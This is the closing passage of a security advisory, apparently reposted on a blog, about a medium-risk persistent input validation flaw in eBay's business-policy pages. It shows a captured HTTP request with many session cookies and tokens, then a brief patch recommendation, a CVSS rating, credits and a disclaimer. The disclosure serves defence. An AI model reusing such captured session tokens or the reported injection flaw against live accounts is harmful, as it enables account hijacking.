User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[image/png,image/*;q=0. 8,*/*;q=0.5] Accept-Language[de-de,de;q=0. 8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[ http://www.bizpolicy. ] Cookie[ebay=%5Epsi%3DASTJiAAE* %5EsfLMD%3D1391608831%5Esbf% 3D%23200000000000c0048002004% 5Ecos%3D1%5Ecv%3D15555%5Esin% 3Din%5Ejs%3D1%5Edv%3D53273c55% 5E; dp1=ba1p/053289001^bl/ DE56e9a581^kms/in56e9a581^reg/ %5EflagReg%3D1%5E56e9a581^ pcid/159931376355087201^mpc/0% 7C7753346d81^pbf/% 2340000000000081a8820000045508 7201^tzo/-3c53274c91^exc/0% 3A0%3A0%3A0534ecb81^mms/0. 53272b71.053288945^u1p/ MjAxNC5rdW56bQ**55087201^u1f/ Benjamin55087201^idm/ 153274c6b^; s= BAQAAAUSucEmyAAWAAAEAClMoeF0yM DE0Lmt1bnptAAMAAVMokAEwAWUAAlM okAEjMgAGAAFTKJABMACoAAFTKHhdM QFKABhTKJABNTMyNzM3YzAuMC4xLjE xLjc4LjIuMC4yAAwAClMokAExMjI1N jM3OTA2AO4AflMokAExBmh0dHA6Ly9 teS5lYmF5LmNvbS93cy9lQmF5SVNBU EkuZGxsP015ZUJheSZteWViYXk9JnR va2VuaWQ9NDgmY3VycmVudHBhZ2U9T XllQmF5UHJlZmVyZW5jZXMmc3NwYWd lbmFtZT1zdWNjZXNzQWRQcmVmZXJlb mNlcwcAEgAKUyiQAXRlc3RDb29raWU A9AAiUyiQASQyJEFQS2hOWS9QJC51a kNnREpDSGIudm1PbzV6TFJUejEA+ AAgUyiQAWQwYTVhZTQ1MTQ0MGE0Mjh iMzgyZmUzMmZmZmZmZTg0ALgADFMnP 60xMzk1MDc5MzUwOjAAPQAKUyiQATI wMTQua3Vuem3M/ bEjO3QgStCZxGHoMG4FWaj2Rg**; nonsession= BAQAAAUSucEmyAAaAAEAAClUIcgEyM DE0Lmt1bnptAWQAA1UIcgEjOGEABAA KVQhaXTIwMTQua3Vuem0AygAgXI1AA WM3N2NmM2RmMTQ0MGEzNTg2YzI0NGF kNGZmZmZmZTRmAMsAAlMnRYkyMQFMA BhVCHIBNTMyNzM3YzAuMC4xLjExLjc 4LjMuMC4yAU0AGFUIcgE1MzI3M2RkM i4wLjEuMi4xMzYuMC4wLjIAEAAKVQh yATIwMTQua3Vuem0AMwAJVQhyATM0M TI4LERFVQDzACJVCHIBJDIkQVBLaE5 ZL1AkLnVqQ2dESkNIYi52bU9vNXpMU lR6MQC0AAFTJ+ 7wMACaAAtTKcndMjAxNC5rdW56bW4A nAA4VQhyAW5ZK3NIWjJQckJtZGo2d1 ZuWStzRVoyUHJBMmRqNkFHa29lbkM1 ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACF UIcgEwMDAwMDAwMYEG3noCCpfEtIJD QA4W2mCUvROF; cssg= d0a5ae451440a428b382fe32fffffe 84; cid=xAMhIMTTiG9hpoAp% 231599313763; lucky9=9393341; npii=btguid/ c77cf3df1440a3586c244ad4fffffe 4f55087201^cguid/ c77cfce61440a56b23d61f96fe2e02 4155087201^; ds1=ats/1395074781098; ns1= BAQAAAUSucEmyAAaAAKUADVUIcgExM jI1NjM3OTA2LzA7Z/ 0uwdxIwLmpExj/Whb9VGXz2oM*; secses= BAQAAAUSucEmyAAaAAUsAGFUIcgE1M zI3MzdjMC4wLjEuMTEuNzguMi4wLjJ dgCSPs+1ulBCbABPTM3Q2B4zn6g**; shs= BAQAAAUSucEmyAAaAAVUADlMwYV01M TYyMjA1MzEwMDQsM0lQMoD56FArTr0 IRZNrcW0RgsFk; JSESSIONID= D0F0865539CABCE246EB953E8860B9 53; ds2=asotr/b7qeZzzzzzzz^sotr/ b7qeZzzzzzzz^] Connection[keep-alive] Response Header: rlogid[t6al%7Cwliodz%3F%3Cwk% 7D1e37e*%3B27c-144d14de1b3- 0x96] Content-Type[text/html; charset=utf-8] Content-Length[1201] Date[Mon, 17 Mar 2014 18:29:05 GMT] Server[eBay Server] Reference(s): http://www.ebay.com/ http://www.bizpolicy.ebay.com/ http://www.bizpolicy.ebay.com/ http://www.bizpolicy.ebay.com/ http://www.bizpolicy.ebay.com/ http://www.bizpolicy.ebay.com/ http://www.bizpolicy.ebay.com/ http://www.bizpolicy.ebay.com/ Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure encode and parse of the vulnerable policy name item list and activity log name list. Restrict the input field for special character and disallow wrong inputs by usage of a secure exception-handling to prevent exections. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the policy name & activity-log module is estimated as medium. (CVSS 4.0) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ( bkm@evolution-sec.com ) [ www.vulnerability-lab.com ] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact. - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/ Feeds: vulnerability-lab.com/rss/rss. - vulnerability-lab.com/rss/rss_ - vulnerability-lab.com/rss/rss_ Programs: vulnerability-lab.com/submit. - vulnerability-lab.com/list-of- - vulnerability-lab.com/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact ( admin@vulnerability-lab.com or research@vulnerability-lab.com ) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
Komentarų nėra:
Rašyti komentarą